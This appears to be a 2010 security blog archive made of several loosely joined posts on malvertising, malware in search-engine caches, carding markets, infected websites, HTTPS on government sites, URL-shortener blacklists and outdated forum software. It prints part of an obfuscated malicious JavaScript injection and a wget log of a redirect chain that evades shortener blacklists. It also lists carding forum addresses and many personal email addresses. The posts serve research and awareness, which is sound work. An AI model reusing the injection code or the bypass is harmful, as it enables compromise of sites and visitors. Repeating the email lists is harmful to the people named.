This “malvertising” is bad for the reputation of the website in question and because it opens up a Pandora’s box of security issues if a visitor decides to follow the link in the advertisement. In this short article we try to determine if certain subsets of the most popular 1 million Internet websites are more vulnerable to attack by spammers.

Experiment Goals

• Where are the spammers targeting their efforts?
• What kind of websites need to put more effort into stopping spammers?

Methodology

We obtained a list of the top 1 million websites from Alexa. We partitioned the list into 3 equal parts, designated as “top,” “middle” and “low” websites. From each subset, we randomly selected 1000 websites and determined if they were hosting spam advertisements.

To determine whether a site was hosting spam advertisements, we queried Google and other search engines with a list of keywords suggesting pharmacy spam (e.g. “buy Kamagra cheap” and “no prescription needed”). Once a website was found to include spam advertisements, the suspect pages from that website were downloaded to ensure that spam advertisements were indeed present.

Interesting Results

• The “top” tier was responsible for 9% of sites hosting spam ads.
• The “middle” tier was responsible for 4% of sites hosting spam ads.
• The “low” tier was responsible for 3% of sites hosting spam ads.

Conclusion

It is surprising to see that “top” ranking websites were more than twice as likely to have spam advertisements on their web pages than “middle” or “low” ranking websites.

It could be that spammers prefer to concentrate on the most popular sites versus the not-so-popular ones or that popular sites have more discussion/message boards that can be exploited. This question could be the basis of a more in-depth study of this phenomenon.

Examples of websites that host spam advertisements

Top sites:

www.pcd.go.th
www.blognone.com
www.howardforums.com
www.memeq.net
www.adrants.com

Middle sites:

www.rankarthai.com
www.pmg.org.za

Low sites:

www.nailshop.ro
www.simple-momreviews.com

Unfortunately, the idea of page caching has not been implemented well. In fact, page caching has opened up new opportunities for malware. The primary problem being that, from a security perspective, when search engines cache copies of websites, they are storing any malware that is present on the site on their own infrastructure as well.

Hackers Exploit Search Engine Page Caches

Most large search engines use some kind of malware analysis to determine if a website is compromised or not. Google for example, has a well tuned system with high accuracy. In our meeting with the Google malware team, some months ago, we were glad to find that they were already aware of this problem. In the weeks following our interaction, cached copies of infected websites were no longer easily available via searches.

Not so long ago, we wrote an article about our efforts to alert Yahoo of the presence of malware in the cached versions of various web pages served up by their search engine. Our efforts were not successful, although the occurrence of malware in Yahoo cached pages seems to have gone down significantly. Perhaps our messages were not entirely ignored.

Recently, an article came up on ISC SANS discussing this very same issue.

Recently, we have found instances of Bing serving up malware in their cached pages. It seems that Bing’s malware detection methods are not able to reliably detect malware on cached web pages. This keeps Bing from securing cached pages which contain malware for its users. We have provided screen shots below as an example of the issue. In this particular case, the strain of malware found in Bing cached pages has been around since 2009.

Search Engines Ignore the Problem

Consider the case where a malicious individual deliberately infects a website with malware and Bing (or another search engine) indexes it. The malicious individual can then send out hyperlinks pointing to the cached web pages hosted by Bing. Any kind of “reputation-checking” for the cached link will confirm that the page is hosted by a reputable company, in this case, Bing (Microsoft). However, the malware will still be able to deliver its payload. Just in case you’re thinking, “my antivirus will protect me from the malware on the cached page,” you may like to read this article.

It is surprising to see that search engines like Bing, which claim to implement malware detection, cannot correctly determine if a cached copy of a web page hosts malware! In these cases, Bing ends up an excellent attack vector for malicious individual.

It remains to be seen if search engine companies will continue to serve up cached pages laced with malware at the same time as they are touting active scan and detection mechanisms. Let’s hope this article can get attention in the upper echelons of management at these large search giants and they start to pay attention to this problem.

Screen shots follow below:

In this article we show that, unlike what you might think, the credit card black-market operates very much in the open. Below we point out websites, which can be used to tap into the cyber black-market and find stolen credit card numbers and the associated credentials to purchase for any purpose they desire. We also show instant messenger handles, emails and details of what cyber criminals are selling on the Internet.

We analyzed 429 unique domains and 615 unique URLs. Each of these URLs contained information about buying stolen credit card information. Each URL lead to a web page where cyber-criminals have posted details about how to interact with them and buy stolen financial credentials. In the majority of cases, cyber criminals who are selling this information can provide one of the following types of data.

The data for this article was collected between February 27th and March 2nd, 2010.

Basic Credit Card Information Offers:

Usually consists of credit card number, type, expiration date and CVV.

USA & CANADA CCV2

VISA/Mastercard ~ 2USD/each
AmEX/Discover   ~ 4 USD/each

UK & WU CVV2

VISA/Mastercard ~ 3USD/each
AmEx/Discover   ~ 5USD/each

Premium Credit Card Information Offers:

Usually consists of credit card number, type, expiration date, CVV, SSN, Home Address, Full Name, Date of Birth and much more.

USA & CANADA CCV2

VISA/Mastercard ~ $35/each

UK & EU

VISA/Mastercard ~ $40/each

ACCOUNT INFORMATION:
First Name: xxxxx
Last Name: xxxxx
Address: xxxxx xxxxx xxxxx xxxxx
Apt:
City: Homestaed
State: FL
Zip: xxxxx
Home Phone: (xxxxx)xxxxx-xxxxx
Work Phone: (xxxxx)xxxxx-xxxxx
Email: xxxxx@yahoo.com
SSN: xxxxx-xxxxx-xxxxx
License Number: xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
License State: FL
DOB: 09/xxxxx/xxxxx

PAYMENT INFORMATION:
Credit Card Type: VISA
Number: xxxxxxxxxxxxxxx
CCV: 889
Expiration Date: 11/2008
Name: xxxxx xxxxx
Card Name First: xxxxx
Card Name Last: xxxxx

PayPal Information Offers:

Verified account                 ~ 20USD/each
Verified account with email pin  ~ 25USD/each
Verified acccount with full info ~ 35USD/each
unverified account               ~ 10USD/each

Some domains host multiple instances of stolen Credit Card Ads, (CC-Ads). We present the frequency distribution of CC-Ads on each unique domain below.

Frequency of CC-Ads on each unique domain.

Interesting Highlights:

• None of the websites advertising stolen credit card data were blacklisted by Google’s Safe Browsing List. This could potentially indicate that cyber criminals are conscientious of not discouraging visitors to these sites.
• Cyber criminals prefer to get paid via Liberty Reserve and Western Union money transfer services.
• Some cyber criminals have used images to provide quotations [img].
• Yahoo.com seems to be the email and instant messaging service preferred by cyber criminals.
• Nearly 75% of sites with CC-Ads are located in the US (see graph below).

IP Geo-location for websites with CC-Ads.

Conclusion:

It is clear from the current state of the credit card black-market that cyber criminals can operate much too easily on the Internet. They are not afraid to put out their email addresses, in some cases phone numbers and other credentials in their advertisements. It seems that the black market for cyber criminals is not underground at all. In fact, it’s very “in your face.” Clearly a more concerted effort is required to clamp down on this problem. Simply tying up loose ends on the enterprise side is not enough to combat this problem when there is virtually nothing to stop criminals from touting their stolen wares freely in the Internet.

Editor’s Note: We are providing a limited list of sites as an example of the brash lawbreaking behavior of these cyber criminals. We believe it is important for the purpose of this article that the reader be able to verify our statements. Additionally, we believe that consumer awareness of the problem can only serve to reduce the ease with which these criminals operate.

Forums used to buy and sell stolen credit card information:

*hxxp://ghostmarket.net
*hxxp://gayatheists.2.forumer.com
*hxxp://www.pakbugs.com/sell
*hxxp://forums.lava-carding.com
*hxxp://www.offcarding.forums-free.com
*hxxp://hack0rz.forums-free.com
*hxxps://security-shell.ws
*hxxp://silverspam.net
*hxxp://sellcvv2.forums-actifs.com

Various instant messenger credentials [1] [2] [3] used by cyber criminals:

People who interacted with “ubuntu_kana” (Yahoo messenger):

• ahmadshrief11@yahoo.com, davidlindon1@gmail.com, frankykkk@yahoo.com, suzannasuro@gmail.com, alexgenieve@hotmail.com, dave3331@gmail.com, ccvhack21@yahoo.com, trungtuyen68@yahoo.com, XUAN_CCS@YAHOO.COM, niklasjulius@rocketmail.com, boy_magnanimous@yahoo.com, FRESH_HACK2002@YAHOO.COM, vic.sell@yahoo.com

People who interacted with “peeseller” (Yahoo messenger):

• aloopapa@yahoo.com, dumpsfresh@yahoo.com, ug.tsunami@yahoo.com, sellrep@yahoo.com,

People who interacted with “bagiabancc” (Yahoo messenger):

• WorkusaJob@yahoo.com, david_cuong_85@yahoo.com, salulynho@yahoo.com, vang_kiban@yahoo.com, pro.cv2er@gmail.com, pro.cv2er@hotmail.com

• Reuters via Threat Level | Wired.com

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the “largest cyber-raid to date” are just being released.

Infection Statistics:

• 190 countries
• 40 of the largest financial institutions
• 50% of 1,000 largest companies

Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.

As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.

We recently saw a strong rise in the appearance of the malicious code below:

this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow="";var  f="";
var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4

By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.

this.v="";:LineMixer [var i=

Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the Google’s Safe Browsing List are not complete.

Till next time.

We show a small sample of the 3000+ infected websites below:

hxxp://saipanlawyer.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.citydusk.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://de.pastebin.ca/1798028/    (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.hotel-ederhof.com/     (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://fast-weight-loss-plan.org/ (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)

Consider the fact that malicious individuals and organizations have already targeted government organizations including the FDIC, IRS, FBI and many more with success. The government response trying to educate the masses can be found in many places. [1] [2] [3]

The goal of this experiment:

• To determine whether government sites provide authentication information using HTTPS.
• To identify characteristics of government websites using or not using HTTPS.

Experiment methodology:

An initial corpus of 150 government websites was mined (via USA.gov). Each website was tested for three signs that indicate whether they employ any authentication mechanism to prove their identity to a visitor.

This experiment was conducted between February 24th and February 25th, 2010.

The three points are listed below:

1. Does the website offer a SSL connection secured by a certificate?
   • If it does, we identify the issuer and the expiration date.
2. Does the website respond to the HTTPS request within 60 seconds?
   • If it does not, we identify the server as mis-configured.
3. Does the website seem to have pages, which have an “https://” in the URL?
   • We find these pages as indexed by Google (e.g. https://secure.site.gov/login.asp).

We present the most interesting results here:

• Only 53% of government sites offer an SSL certificate to prove their identity.
  Note: The certificates for these sites will not expire in less than 30 days.
• Approximately 6% of government sites have self-signed SSL certificates or certificates signed by authorities which are not widely recognized.
  Note: Accessing these websites via a modern browser will cause a warning message to be displayed.
• Approximately 13% of government sites use expired SSL certificates to prove their identity.
• Approximately 1% of government sites have credentials which will expire in less than 30 days.
• A whopping 33% of government sites with HTTPS are mis-configured. However, they work fine with HTTP.

Significant numbers of government websites are not using authentication mechanisms effectively.

Conclusion:

This limited experiment shows that websites operated by the government have a long way to go in terms of proving their identity to end users. These issues should not be treated lightly as they provide impetus to malicious individuals to develop phishing scams targeting government owned infrastructure.

Note: Due to the sensitive nature of this information we will not disclose specific government sites with security issues.

Watch Anirban describe the goals of stopthehacker.com:

• Scott Tech Center & Innovation Accelerator Host Cyber Security Event

Thanks again to the Silicon Prairie News for covering us at the event!

Case in point:

• Google: goo.gl
• Microsoft: binged.it

These URL shortening services are godsend for Internet surfers tired of copying and pasting long, ugly looking, URLs. But hold on a minute! All is not hunky dory in URL Shortening Land.

Due to processes inherent to “URL Shortening,” the original URL an Internet surfer might like to shorten is, for all purposes, being obfuscated. Is this a problem? Yes. Why, you ask? Consider the fact that people, not even necessarily tech-savvy ones, have learned to double check the links present in their emails and on websites. They even have help from various browser plugins, but in general, users are smartening up. When these same people see “shortened” links, they have no way to make a judgment call on whether visiting the link is safe, or not. For example, you may recognize www.stopthehacker.com as being a benign, safe to visit link, but what about bit.ly/oJMrP or bit.ly/dc38ze?

Articles published from credible sources, like ISC SANS, show that URL shortening services, when compromised, can provide an excellent mechanism for malicious hackers to infect unsuspecting visitors. Criminals use these services to bypass Google’s Safe Browsing service, which is used by popular browsers.

To combat this growing menace, URL shortening services have partnered with security companies to identify malicious URLs and websites. Some of them even use the SURBL blacklists to identify if someone has tried to link to a malicious website.

This article attempts to identify the effectiveness of security measures put in place by the various URL shortening services.

This experiment answers the following questions:

• Do URL shortening services have any kind of security measures in place?
• How effective are these security measures?

The 25 URL shortening services evaluated in this article are listed below:

We compare 25 URL shortening services listed below. Each URL shortening service is analyzed to measure the effectiveness of their security measures. We use a two stage process to evaluate the security implemented by each service.

snipr.com
budurl.com
bit.ly
short.to
twurl.nl
chilp.it
fon.gs
ub0.cc
snurl.com
fwd4.me
short.ie
a.gd
hurl.ws
kl.am
to.ly
hex.io
tr.im
cli.gs
urlborg.com
is.gd
sn.im
ur1.ca
tweetburner.com
tinyurl.com
snipurl.com

Experiment methodology:

An initial corpus of 932 websites was obtained from Malware Patrol a well respected source of information about malware infected websites, which receives nearly 3,500,000 hits/month. This experiment was conducted between February 2nd and February 4th, 2010.

For each URL obtained from Malware Patrol, we attempt to create shortened URLs for each site domain and full URL using each of the 25 services.

We denote a service as Stage 1 Compliant if it appears to use a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain. Does the URL shortening service allow a user to create a URL pointing to a malicious domain (e.g. http://www.badsite.dom)?

We denote a service as Stage 2 Compliant if it uses a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain or malicious full URL hosted on that domain. Does the URL shortening service allow a user to create a URL pointing to a malicious link hosted on a malicious domain (e.g. http://www.badsite.dom/badfolder/badfile)?

We present the most interesting results in brief:

• Approximately 68% of URL shortening services were Stage 1 Compliant.
• Approximately 56% of URL shortening services were exclusively Stage 2 Compliant.
• Approximately 52% of URL shortening services were both Stage 1 Compliant and Stage 2 Compliant (see graph below).

Observations on specific URL shortening services:

• bit.ly seems to favor blocking malicious domains rather than specific links.
• fwd4.me, hurl.ws and urlborg.com seem to favor blocking malicious links rather than specific domains.
• bit.ly failed to qualify as Stage 2 Compliant due to 0.5% of tested URLs.
• fwd4.me failed to qualify as Stage 1 Compliant due to 9.8% of tested URLs.
• hurl.ws failed to qualify as Stage 1 Compliant due to 0.3% of tested URLs.
• urlborg.com failed to qualify as Stage 1 Compliant due to 0.3% of tested URLs.

Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs.

Stage 1 Compliant and Stage 2 Compliant services:

budurl.com
cli.gs
fon.gs
hex.io
is.gd
kl.am
sn.im
snipr.com
snipurl.com
snurl.com
to.ly
tr.im
ub0.cc

Deeper security issues remain:

It seems that popular services like bit.ly, which do try to use blacklists in order to prevent malicious hackers from using their services and pointing to bad websites, can still be easily fooled by chaining together shortened URLs created by another service. We have found that if a malicious user can create a shortened URL using a service that does not implement blacklist checks or is not effective, then a service like bit.ly can be tricked into redirecting the visitor via the malicious shortened URL to a malicious domain. Effectively, users can be redirected to a malicious site regardless of bit.ly performing all its checks. See the appendix for an example below (wget log).

Conclusion:

This limited experiment shows that URL shortening services have a long way to go before Internet users can trust them to deliver safe links. About half of the most popular URL shortening services seem to be somewhat effective at blocking access to well known malicious URLs that can be found on blacklists. It remains to be seen if these URL shortening services can improve and provide a safer web experience for their users.

Appendix

Wget log example:

In this example, a malicious link (hxxp://wywg.ccsfyb.cn/wywg/txer) has been shortened using ow.ly (hxxp://ow.ly/Zyv3). Then, this shortened URL is fed to bit.ly. The shortened bit.ly URL (hxxp://bit.ly/5s4YhP) is created successfully and blacklist checks are no longer effective.

$ wget -O demonstrate_bit.ly_exploit http://bit.ly/5s4YhP
--scrubbed--  http://bit.ly/5s4YhP
Resolving bit.ly... 168.143.174.29, 128.121.234.46, 128.121.254.129, ...
Connecting to bit.ly|168.143.174.29|:80... connected.
HTTP request sent, awaiting response... 301 Moved
Location: http://ow.ly/Zyv3 [following]
---scrubbed--  http://ow.ly/Zyv3
Resolving ow.ly... 75.101.155.42
Connecting to ow.ly|75.101.155.42|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://wywg.ccsfyb.cn/wywg/txer [following]
---scrubbed--  http://wywg.ccsfyb.cn/wywg/txer
Resolving wywg.ccsfyb.cn... 98.126.11.178
Connecting to wywg.ccsfyb.cn|98.126.11.178|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://wywg.ccsfyb.cn/wywg/txer/ [following]
---scrubbed--  http://wywg.ccsfyb.cn/wywg/txer/
Reusing existing connection to wywg.ccsfyb.cn:80.
HTTP request sent, awaiting response... 403 Forbidden
-scrubbed-- ERROR 403: Forbidden.

vBulletin is a little bit different than the list of CMSes we have been analyzing in this series. The first and most apparent being that it is not a free piece of software. The vBulletin site displays a cost of $195-$285 for a new license. The obvious question then, is why do people pay for this CMS when there are other good CMSs available for free? The answer lies in the varied list of features, such as a built-in photo album, event management and many other interesting and helpful features. Add to this good support, compatibility with existing software, many themes, built-in integration for payment engines and advertisement support… it’s not hard to see why vBulletin has acquired a large fan base.

Next, we will take a closer look at vBulletin to understand security issues facing active installations seen publicly on the Internet.

The aim of this experiment:

• To determine the number of vBulletin sites using older versions of the CMS package (and hence vulnerable to attacks).
• To identify the associated scripts vBulletin that users install in addition to core vBulletin functionality.
• Identify the vulnerabilities of using the associated scripts.

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed vBulletin. Understandably, not all 100,000 websites would actually be using vBulletin. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by vBulletin or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between February 5th and February 8th, 2010.

Distribution of vBulletin versions:

In 93.09% of sites running on vBulletin the version number could be identified. We found the following distribution of vBulletin versions in the websites examined (where versions of installations could be determined). A more detailed breakdown of the distribution of vBulletin versions can be seen at the end of this article.

Significant numbers of older vBulletin installations are present on the Internet.

Note: Publicly available information about exploits for vBulletin 3.x.x and earlier versions exist. [1] [2]

We present the most interesting results here:

• Nearly 95% (see graph above) of vBulletin sites are running older versions for which exploits are available.
• None of the vBulletin sites were blacklisted by Google Safe Browsing.
• Only 13.5% of vBulletin sites had Iframes embedded in them. None of the Iframes were obfuscated or tried to load malware. All Iframes found loaded ads.
• 10.2% of the vBulletin sites which had Iframes were using JQuery.
  Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism.
• Only 0.1% of the vBulletin sites use Mootools
• None of the vBulletin sites use AC_RunActiveContent.js.

Conclusion:

This limited experiment shows that like WordPress, vBulletin also suffers from a large number of vulnerable installations being available on the Internet. It is intriguing to see that a CMS system, which is not free, and is tightly controlled is not kept up to date across the board. Consider the case of Drupal, where we observed that the variety in the versions of various installations is very low. The natural question at this point is: why is a free CMS system like Drupal doing better, security-wise, than a commercial CMS system like vBulletin? Why are most Drupal installations up to date. One thing to note though is that like Drupal and phpBB, vBulletin installations also seem to be relatively safe from the most prevalent malware. Most Iframes on vBulletin sites are Ads, a likely revenue stream for most forum admins.

The fact remains that there many vulnerable installations of vBulletin which can fall prey to malicious hackers.

Till next time.

See below for detailed breakdown of the distribution of vBulletin versions:

• 0.89% of sites were running version 3.0.13
• 0.29% of sites were running version 3.0.14
• 0.29% of sites were running version 3.0.3
• 0.29% of sites were running version 3.0.5
• 0.29% of sites were running version 3.0.7
• 1.18% of sites were running version 3.5.2
• 2.67% of sites were running version 3.5.4
• 0.29% of sites were running version 3.6.1
• 1.18% of sites were running version 3.6.10
• 0.59% of sites were running version 3.6.12
• 1.18% of sites were running version 3.6.2
• 4.45% of sites were running version 3.6.4
• 0.29% of sites were running version 3.6.6
• 1.48% of sites were running version 3.6.7
• 4.74% of sites were running version 3.6.8
• 0.29% of sites were running version 3.6.9
• 2.96% of sites were running version 3.7.0
• 2.37% of sites were running version 3.7.1
• 1.78% of sites were running version 3.7.2
• 4.74% of sites were running version 3.7.3
• 2.37% of sites were running version 3.7.4
• 1.18% of sites were running version 3.7.5
• 2.96% of sites were running version 3.7.6
• 1.48% of sites were running version 3.8.0
• 8.90% of sites were running version 3.8.1
• 10.3% of sites were running version 3.8.2
• 3.85% of sites were running version 3.8.3
• 31.7% of sites were running version 3.8.4
• 2.07% of sites were running version 4.0.0
• 2.07% of sites were running version 4.0.1
• 0.59% of sites were running version 4.0.2

I can already hear CMS purists howling that phpBB is not a CMS. In a way they’re right, but in other ways it is a CMS.  phpBB is without a doubt one of the most popular “Internet Forum” software packages available. Its ease of installation, various custom skins, and large installation base make it a very attractive choice for anyone who wishes to set up a community discussion board on the Internet. phpBB has had a few million downloads at the very least and enjoys a very active user group.

phpBB is popular among webmasters who want to set up Internet forums easily. Users of phpBB also benefit from a high level of customization. Another big plus for this CMS. Support for this CMS is awesome, in fact, phpBB has flash based video tutorials to help new users get started! Additionally, the phpBB developer community is very security conscious.

Next, we will take a close look at phpBB to understand security issues with active installations seen publicly on the Internet.

The aim of this experiment:

• To determine the number of phpBB sites using older versions of the CMS package (and hence vulnerable to attacks).
• Identify the associated scripts phpBB users install in addition to core phpBB functionality.
• Identify the vulnerabilities of using the associated scripts.

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed phpBB. Understandably, not all 100,000 websites would actually be using phpBB. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by phpBB or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between February 1st and February 3rd, 2010.

Distribution of phpBB versions:

In 84.16% of sites running on phpBB a version number of the CMS package could be identified. We found the following distribution of phpBB versions in the websites examined (where versions of installations could be determined).

• 32.2% of sites were running version 2.x
  Note: Publicly available information about exploits for phpBB 2.x versions exist.
• 67.8% of sites were running version 3.x

We present the most interesting results:

• None of the phpBB sites were blacklisted by Google Safe Browsing.
• Only 2.5% of phpBB sites had Iframes embedded in them. None of the Iframes were obfuscated or tried to load malware.
• None of the phpBB sites which had Iframes were using JQuery.
  
• About 4.2% of all phpBB sites use jQuery.
  Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism.
• Only 0.3% of the phpBB sites use Mootools.
• Only 0.3% of the phpBB sites use AC_RunActiveContent.js.

Conclusion:

This limited experiment shows that like Drupal, phpBB installations seem to be relatively safe from the most prevalent forms of malware. However, the fact remains that there are quite a few vulnerable installations of phpBB which can fall prey to malicious hackers. This trend is echoed by our analysis of WordPress . It will be interesting to probe further and understand why the number of “infected” sites is not higher when there are vulnerable installations in the wild.

Till next time.